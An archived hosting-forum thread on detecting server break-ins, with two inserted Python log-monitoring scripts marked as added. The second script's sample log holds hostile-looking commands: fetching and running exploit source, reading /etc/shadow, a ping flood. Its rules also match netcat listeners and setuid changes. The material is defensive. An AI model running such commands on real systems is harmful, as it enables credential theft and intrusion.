
monitor for illegal activity
Dexter 11-01-2000, 12:48 AM Just wondering what people do/use to monitor for illegal activity, like users trying to hack/crack to gain root access to the server. Does anyone actually monitor, or do you just wait till it's happened and then fix it?
JFTR, I have a server and within the last 2 weeks it's been hit twice. Most likely by the same person(s), as the same user accounts have been created. It's quite aggravating, as I thought I had this system locked up pretty darn tight. It would be nice to have some sort of monitoring system to warn me when someone's on the system messing around...
Well, there are a lot of security apps; Tripwire is one of them, which you can find at http://freshmeat.net/
Hi everyone,
Please correct me if I'm wrong, but my understanding of Tripwire is that it only notifies you *after* a compromise has been made. IMHO, it's not very effective at deterring intruders, but more a way of letting you know when your server has been hacked into?
I'm also looking for a program which (hopefully) features intelligent detection and subsequent banning of users suspected of illegal activities against the server.
Anybody care to suggest whether such programs exist?
Travis 11-01-2000, 02:00 AM Unfortunately, most of the time, there *isn't* a way to catch a user before they compromise a system.
Let's face it, it's not like these people are typing "give me root access" at the prompt. Most exploits these days involve buffer overflows or other bad input checking by software running with privileges. You can't effectively monitor for intrusions via these methods, at least before it happens. What you can do is make sure that you've plugged up all known holes in your system.
Further complicating things is that anyone with root access can cover their tracks quite effectively. Remember, all data on the local system can be tampered with when a box is compromised, including monitoring and reporting systems.
There are a few things you can do in the way of monitoring, of course. You can filter and watch logs for repeated password failures, dumb users trying to su to root, etc. But ultimately, you will probably not know somebody has compromised your box until they have. That's where it's a must to have solid recovery procedures, and competent staff that can identify the exploit used and plug it up.
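The kind of log watching Travis describes (repeated password failures, users trying to su to root) is straightforward to script. The following is an added example, not code from the thread: it parses auth log lines in the classic syslog/PAM format of the period, raises a brute-force alert when one source IP accumulates a threshold of failed logins inside a sliding time window, and flags failed and successful su to root. The sample log, hostnames, IPs, user names, thresholds and window are all constructed assumptions.

```python
"""Watch auth log lines for brute-force logins and su-to-root activity.

Added example (not from the original thread). Log lines are constructed
in the syslog/PAM format of the era; hosts, IPs and users are made up.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample log, not real data.
SAMPLE_LOG = """\
Nov  1 00:48:01 web1 sshd[4101]: Failed password for root from 10.9.8.7 port 40211 ssh2
Nov  1 00:48:03 web1 sshd[4103]: Failed password for root from 10.9.8.7 port 40212 ssh2
Nov  1 00:48:04 web1 sshd[4105]: Failed password for admin from 10.9.8.7 port 40213 ssh2
Nov  1 00:48:06 web1 sshd[4107]: Failed password for test from 10.9.8.7 port 40214 ssh2
Nov  1 00:48:07 web1 sshd[4109]: Failed password for oracle from 10.9.8.7 port 40215 ssh2
Nov  1 00:51:30 web1 sshd[4120]: Failed password for bob from 192.168.1.20 port 1045 ssh2
Nov  1 00:51:44 web1 sshd[4121]: Accepted password for bob from 192.168.1.20 port 1046 ssh2
Nov  1 00:52:10 web1 su(pam_unix)[4130]: authentication failure; logname=bob uid=500 euid=0 tty=pts/1 ruser=bob rhost=  user=root
Nov  1 00:52:15 web1 su(pam_unix)[4131]: authentication failure; logname=bob uid=500 euid=0 tty=pts/1 ruser=bob rhost=  user=root
Nov  1 00:52:21 web1 su(pam_unix)[4132]: authentication failure; logname=bob uid=500 euid=0 tty=pts/1 ruser=bob rhost=  user=root
Nov  1 00:53:02 web1 su(pam_unix)[4133]: session opened for user root by bob(uid=500)
"""

# syslog prefix: "Mon dd HH:MM:SS host <body>"
TS_RE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ (.*)$")
FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+)")
SU_FAIL_RE = re.compile(r"su\S*: authentication failure;.*logname=(\S+).*user=(\S+)")
SU_OK_RE = re.compile(r"su\S*: session opened for user (\S+) by (\S+)\(uid=\d+\)")


def parse_ts(stamp, year=2000):
    """syslog timestamps carry no year; assume one so times can be compared."""
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")


def analyze(log_text, fail_threshold=5, window_seconds=60, su_fail_threshold=3):
    """Return a list of (kind, subject, detail) alerts for the given log text.

    kind is 'bruteforce' (subject = source IP), 'su_failures' (subject = the
    user who kept failing su to root) or 'su_root' (subject = user who got root).
    """
    alerts = []
    recent = defaultdict(deque)    # source IP -> timestamps of failures in the window
    flagged_ips = set()            # alert once per IP, not once per failure
    su_failures = defaultdict(int)  # logname -> failed su-to-root count
    for line in log_text.splitlines():
        m = TS_RE.match(line)
        if not m:
            continue
        ts, body = parse_ts(m.group(1)), m.group(2)
        fail, su_fail, su_ok = FAILED_RE.search(body), SU_FAIL_RE.search(body), SU_OK_RE.search(body)
        if fail:
            user, ip = fail.groups()
            q = recent[ip]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_seconds:  # drop failures outside the window
                q.popleft()
            if len(q) >= fail_threshold and ip not in flagged_ips:
                flagged_ips.add(ip)
                alerts.append(("bruteforce", ip,
                               f"{len(q)} failed logins within {window_seconds}s (last user tried: {user})"))
        elif su_fail:
            logname, target = su_fail.groups()
            if target == "root":
                su_failures[logname] += 1
                if su_failures[logname] == su_fail_threshold:
                    alerts.append(("su_failures", logname, f"{su_fail_threshold} failed su to root"))
        elif su_ok:
            target, by = su_ok.groups()
            if target == "root":
                alerts.append(("su_root", by, "successful su to root"))
    return alerts


if __name__ == "__main__":
    for kind, subject, detail in analyze(SAMPLE_LOG):
        print(f"{kind:12} {subject:15} {detail}")
```

Run it from cron against the auth log, or feed it a `tail -f` stream. Note the caveat Travis raises: once the box is rooted, these logs can be edited or wiped, so the copy worth alerting on is the one shipped to a separate loghost.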
Chicken 11-01-2000, 10:37 AM I get a whole slew of anonymous ftp logins (anonymous ftp is not enabled on any domain). Every IP address on the machine is tried. I think someone mentioned that this is pretty common.
Travis 11-01-2000, 03:45 PM I see it all the time. Easy fix: turn off anonymous logins, or better yet, FTP if you don't need it. :)
Chicken 11-02-2000, 02:22 AM Yep, these are attempts. I don't turn on anon. ftp.
cbaker17 11-02-2000, 10:45 PM Red Hat is terrible about security.
The other day we put up a new box with no services running on it, and all of a sudden one of the techs noticed it was generating like 4.5mbs of traffic, and nothing was even on that box. It was crazy; I'm not sure what they found out the deal was.
Félix C.Courtemanche 11-02-2000, 10:48 PM Red Hat 6.2 and security freaks... go to http://www.openna.com/books/registration.htm and download a copy of the pdf of their book. It explains everything to do to secure a red hat system, including how to monitor logs, patch systems, monitor ports, everything.
It is very well written,... and IT'S FREE! :) (I love linux)
inbuco 01-03-2001, 05:07 PM I use PortSentry; it works very well and it's free.
Here you go, http://www.psionic.com/abacus/portsentry/
I hope that this helps.
Toons 01-07-2001, 09:03 PM In terms of monitoring users already on the servers (those that have telnet access), we use a modified version of bash that logs all their commands directly to a file, which is then grepped once a day for various suspect words, and anything interesting is mailed to the admins. We don't publicise the fact too much (not that we hide it either), so it hasn't put people off trying, but it's certainly helped us catch several people trying various exploits, trying to DoS from our servers, etc.
If anyone wants a copy, I can probably dig it out.
Regards,
Tony Lucas
UnitedTec 01-07-2001, 09:08 PM I would love to have a copy. Please contact me about it.
CRego3D 01-08-2001, 12:21 AM Please, me too :) that sounds like a terrific add-on
kunal 01-08-2001, 04:06 AM Could I have a copy to please?
Toons 01-08-2001, 04:46 AM Its at http://www.virtualhoster.co.uk/bash+xcal.tar.gz for those that are interested.
Logs to /var/log/.bashlogs.
I'll leave it up to you guys to write the cron scripts for it, as ours are integrated into other scripts.
Regards,
Tony Lucas
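Toons describes a daily grep of the command log for suspect words, with hits mailed to the admins. The following is an added example of that review step, not Toons' code and not from the archive linked above; the format of /var/log/.bashlogs is not given in the thread, so the line format here (`timestamp user[pid]: command`), the sample entries, user names and IPs are all constructed assumptions. Instead of a flat word list it matches command structure, so a user who greps their own docs for the word "exploit" is not reported while a fetch-compile-run sequence is.

```python
"""Daily review of a per-command shell log, grouped per user.

Added example (not the modified bash from the thread). The log format
and sample lines are assumed; adapt LINE_RE to the real file.
"""
import re
from collections import defaultdict

# Constructed sample log in the assumed format "YYYY-MM-DD HH:MM:SS user[pid]: command".
SAMPLE_BASHLOG = """\
2001-01-08 03:12:44 kunal[2211]: ls -la
2001-01-08 03:13:01 kunal[2211]: wget http://198.51.100.7/xpl.c
2001-01-08 03:13:09 kunal[2211]: gcc -o xpl xpl.c
2001-01-08 03:13:15 kunal[2211]: ./xpl
2001-01-08 04:01:30 alice[2390]: vi index.html
2001-01-08 04:40:12 bob[2402]: ping -f -s 65000 203.0.113.9
2001-01-08 04:41:00 bob[2402]: cat /etc/shadow
2001-01-08 05:10:22 alice[2390]: grep -r exploit docs/
"""

LINE_RE = re.compile(r"^(\S+ \S+) (\S+)\[(\d+)\]: (.*)$")

# Rules match the shape of a command, not bare words, to keep false positives down.
RULES = [
    ("fetch-source", re.compile(r"\b(?:wget|curl|lynx|ftp)\b.*\.(?:c|tgz|tar\.gz)\b")),
    ("compile", re.compile(r"^(?:gcc|cc)\b")),
    ("run-local-binary", re.compile(r"^\./\S+")),
    ("flood", re.compile(r"\bping\b.*\s-f\b|\bnmap\b")),
    ("shadow-read", re.compile(r"/etc/shadow\b")),
    ("setuid", re.compile(r"\bchmod\b.*(?:[ugo]*\+s|4755)")),
    ("netcat-listener", re.compile(r"\b(?:nc|netcat)\b.*\s-[el]\b")),
]


def audit_commands(log_text):
    """Return {user: [(timestamp, (rule names...), command), ...]} for suspect commands only."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, user, _pid, cmd = m.groups()
        cmd = cmd.strip()
        matched = tuple(name for name, rx in RULES if rx.search(cmd))
        if matched:
            hits[user].append((ts, matched, cmd))
    return dict(hits)


def build_digest(hits):
    """Format the audit result as the body of the daily mail; empty string if nothing to report."""
    if not hits:
        return ""
    out = []
    for user in sorted(hits):
        out.append(f"== {user}: {len(hits[user])} suspect command(s)")
        for ts, rules, cmd in hits[user]:
            out.append(f"  {ts}  [{','.join(rules)}]  {cmd}")
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    print(build_digest(audit_commands(SAMPLE_BASHLOG)), end="")
```

Wire `build_digest` into a cron job that pipes the output to `mail` only when it is non-empty. Two caveats a practitioner will want: a logging shell records only what is typed into that shell, so a user who starts `sh`, `perl` or a script bypasses it, and the log file lives on the same box the user is attacking, so it is only trustworthy until they get root.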
kunal 01-08-2001, 05:03 AM Thanx :)
marksy 01-09-2001, 01:39 PM We've formed a virtual crimewatch community - all our sites participate...we put stickers on our servers letting everyone know it is a crimewatch server...so I seriously doubt hackers will come snooping around.
Oh yeah, and we use nessus
Domenico 10-03-2001, 07:53 AM Originally posted by Toons
Its at http://www.virtualhoster.co.uk/bash+xcal.tar.gz for those that are interested.
Logs to /var/log/.bashlogs.
I'll leave it up to you guys to write the cron scripts for it, as ours are integrated into other scripts.
Regards,
Tony Lucas
Can you put it back up again for me please so I can download it?
Thank you.
Please be aware this thread is about 10 months old. I would suggest emailing Toons first. I'll leave it open since it might benefit other people...
Domenico 10-03-2001, 09:25 AM I know but maybe someone else has it for me.
node9 10-03-2001, 03:40 PM Well, I don't know if what I say will be any help, but what I usually do is run iplog.
But see, my situation is different, because my server is a private box. My friend and I are the only ones that log in, via ssh; the rest are denied with TCP wrappers. Telnet is disabled, and only a couple of people have FTP logins (ONLY).
So what I do is install iplog and run tail -f /var/log/iplog.log and monitor my server that way.........
If I see port scans, FTP attempts, I know what they are trying to do. Besides, I know how, I won't call them hackers, but "kiddies" think.
Another thing you can do, I suppose, is install ttysnoop, and from there, if anyone has a shell, you can watch their screen through ttysnoop. But I don't suggest running telnet, since there are remote root telnet exploits out there :)
node9 10-03-2001, 09:50 PM Originally posted by cbaker17
Red Hat is terrible about security.
The other daym we put up a new box, with no services running on it and all of a sudden one of the techs noticed it was generating like 4.5mbs of traffic, and nothing even on that box, it was crazy, im not sure what they found out the deal was.
If there are no services running, I highly doubt it was Red Hat.
????
CagedTornado 10-03-2001, 10:24 PM OK... for a Linux box, you're going to want the following standard things installed, config'd and running:
Portsentry: Already mentioned, this puppy monitors certain ports to see if someone is 'portscanning' your system. This typically happens in the 'front' or 'beginning' part of an attack. Portsentry can be configured to just log the attack, or actually block the offending host. Available at http://www.psionic.com/
Logcheck: A simple utility -- this runs at regular intervals, scans system logs, and emails suspicious activity to the admin. Good for catching an attack in progress. Also available at http://www.psionic.com/
Tripwire: Yes, you're correct. This only catches things after they happen. But as the folks at the Honeynet Project ( http://project.honeynet.org/ ) will tell you, it's good to have documentation to analyze after an attack. This can help you find weaknesses, and can tell you about files that have been affected.
For a truly secure system, or a firewall:
Harden your box/network using ipchains: There's no substitute for hardening your network by closing off unneeded ports or services. I'd also recommend turning off ICMP echo replies.
Use Snort: The folks at Snort are a fun bunch. The tool they've built uses 'packet signatures' to detect attacks from a mile away. Check it out at http://www.snort.org
Use NAT/reverse proxying using port forwarding: This makes it easier to lock down your entire network from one location. This might create a speed bottleneck, though, so be sure to do a risk analysis before diving into this.
Check out HostSentry: This might be what you're looking for. Apparently, this will look for 'bad people trying to log in' by evaluating the normal pattern of logins that occur on a system. Also available at http://www.psionic.com/
Questions? Comments? Need advice for NT/2000? Drop me a line via email or PM.
-Dan
One thing I wanted to point out is the potential conflict between PortSentry and running a firewall (on the same box). I don't know if PortSentry does this by default (I don't personally use it), but in one configuration I've seen, the installation set up a cron to flush your 'ipchains' rules every hour.
The logic was that it can't do its job if the ports are blocked, but there are cases where you might want to monitor some ports, and block other specific ports (or hosts or protocols). It took a bit of troubleshooting to figure out why the firewall kept disappearing.
I don't recall if it also flushed the 'forward' chain, or if it affects 'iptables' or not, but it's something to keep in mind if you have problems similar to this.
CagedTornado 10-04-2001, 01:41 PM I've never seen that behavior in Portsentry.
It blocks hosts permanently both through hosts.deny and ipchains.
If the ports are blocked, the job of securing the box (by monitoring portscans and taking action) is already done. Portsentry would be overkill.
Dan